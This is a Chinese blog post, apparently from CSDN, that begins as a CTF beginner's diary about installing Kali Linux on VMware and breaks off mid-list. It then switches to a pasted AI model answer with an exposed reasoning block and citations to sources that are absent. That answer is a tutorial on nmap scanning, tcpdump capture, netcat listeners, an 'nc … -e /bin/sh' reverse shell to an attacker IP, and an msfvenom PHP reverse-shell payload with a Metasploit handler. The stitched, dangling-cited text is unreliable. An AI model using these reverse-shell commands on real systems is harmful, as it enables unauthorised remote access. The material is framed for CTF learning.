CTF小白的kali学习日记(1)

本文是CTF新手在VMware上安装kali Linux的学习日记,记录了安装过程中遇到的问题,如无图形界面、中文乱码及无法连接官方源。建议新手选择下载VM版本的kali,因其包含完整的英文原版系统,安装更顺畅。

CTF小白的kali学习日记(1)

kali虚拟机安装

VMware

kali


kali虚拟机安装

VMware

使用kali的第一步当然是要装kali虚拟机

不会真的有人把kali装在物理机上吧

这里我用的是VM ware,安装教程在这里,安装过程并不困难

 

镜像是一种文件格式,是为了后面使用虚拟光驱装系统准备的

kali

VM安装好以后就要找kali的镜像了,kali的镜像可以在官网找到

跟着教程安装了好几遍,系统每次都安装上去了,但是总会出现这样那样的问题

大概是这么几个方面的问题

1.没有图形界面。

2.下载时选择了中文版,中文乱码。

3.无法安装软件的时候无法连接kali的官方源,又换不回国内的源

大概原因我也分析出来了:

1.字体和图形界面大概率都是因为国外的源被墙了,下载速度过慢导致系统判断无法链接。没有图形界面的话, 开启系统就进入命令行界面。

2.2020版本的kali取消了用户默认root权限,要更改sources.list文件一定要root权限,这是我后来发现的。

<think>好的,我现在需要帮用户了解如何在CTF场景下使用Kali进行主机监听。首先,用户提到了Kali的网络配置和nmap扫描,引用[1]中提到了nmap -sP来发现靶机,这可能涉及到主机发现的基础步骤。用户需要的是具体的监听教程,所以应该从网络配置、工具使用、实战步骤等方面展开。 首先,要确保Kali的网络设置正确。CTF中常用的是NAT模式或者桥接,这会影响监听的IP地址选择。然后,用户可能需要使用工具如tcpdump或Wireshark进行流量捕获,引用[4]提到tcpdump可以执行任意命令,但这里用户需要的是监听,所以应重点介绍如何用tcpdump捕获数据包。 接下来,主机发现是关键步骤,nmap的扫描命令需要详细说明,比如-sP用于Ping扫描,之后可能需要更详细的端口扫描,如-sS。同时,Metasploit的模块可能用于漏洞利用后的监听,比如设置反向shell的监听端,引用[3]中的wget下载reverse.txt可能涉及payload的生成和监听,所以这里需要解释如何用nc或msfvenom生成payload并启动监听。 另外,引用[2]提到直接与互联网互通,可能涉及端口转发或内网穿透,但在CTF中可能更多是本地监听,比如使用nc监听特定端口等待反向连接。需要分步骤说明,比如使用nc -lvp 4444,以及如何结合漏洞利用触发连接。 还要注意权限问题,引用[4]提到以root权限执行tcpdump,可能某些监听工具需要提升权限,所以在教程中要提醒用户必要时使用sudo。此外,实战案例需要结合具体的例子,比如在获取webshell后,如何通过命令让靶机连接到监听端口,引用[3]中的例子可能涉及下载reverse shell脚本并执行,从而触发监听端的连接。 最后,生成相关问题需要考虑用户可能的后续疑问,比如监听没反应怎么办,如何过滤数据包,或者如何自动化监听过程。需要覆盖工具使用、排错、优化等方面的问题。</think>### KaliCTF场景下的主机监听教程 #### 一、网络配置与工具准备 1. **网络模式选择** 确保Kali处于与目标相同的网络环境(如NAT或桥接模式),通过`ifconfig`或`ip a`查看本机IP,例如发现网段为`192.168.0.0/24`时,可快速定位靶机[^1]。 2. **基础工具安装** Kali默认集成以下工具: - `nmap`:用于主机发现与端口扫描 - `tcpdump`:命令行抓包工具 - `Wireshark`:图形化流量分析工具 - `netcat (nc)`:网络调试与监听工具 --- #### 二、主机发现与端口扫描 1. **快速发现存活主机** 使用`nmap`进行Ping扫描: ```bash nmap -sP 192.168.0.0/24 ``` 输出示例: ``` Nmap scan report for 192.168.0.105 Host is up (0.00020s latency) ``` 2. **详细端口扫描** 对目标IP进行SYN隐形扫描: ```bash nmap -sS 192.168.0.105 -p 1-1000 ``` --- #### 三、流量监听实战方法 1. **tcpdump基础监听** 监听指定网卡的流量(需root权限): ```bash sudo tcpdump -i eth0 -vnn host 192.168.0.105 ``` 关键参数说明: - `-i`:指定网卡 - `host`:过滤特定IP - `port`:过滤端口(如`port 80`) 2. **netcat建立监听端口** 监听本地4444端口等待反向连接: ```bash nc -lvp 4444 ``` 若靶机通过漏洞触发连接(如执行`nc 192.168.0.100 4444 -e /bin/sh`),即可获得shell[^4]。 --- #### 四、Metasploit高级监听 1. **生成反向shell载荷** 使用`msfvenom`生成PHP反向shell: ```bash msfvenom -p php/reverse_php LHOST=192.168.0.100 LPORT=4444 -f raw > shell.php ``` 2. **启动监听模块** ```bash msfconsole use exploit/multi/handler set PAYLOAD php/reverse_php set LHOST 192.168.0.100 set LPORT 4444 exploit ``` --- #### 五、实战案例:CTF中的Web渗透监听 1. **场景复现** 假设通过Web漏洞上传了webshell(如`shell.php?cmd=id`),可触发靶机连接监听端: ```bash wget http://攻击机IP/shell.php -O /tmp/s.php # 引用[3]类似手法 ``` 2. **监听结果捕获** 在Kali中观察到TCP握手包即表示连接成功,后续可进行交互式操作。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值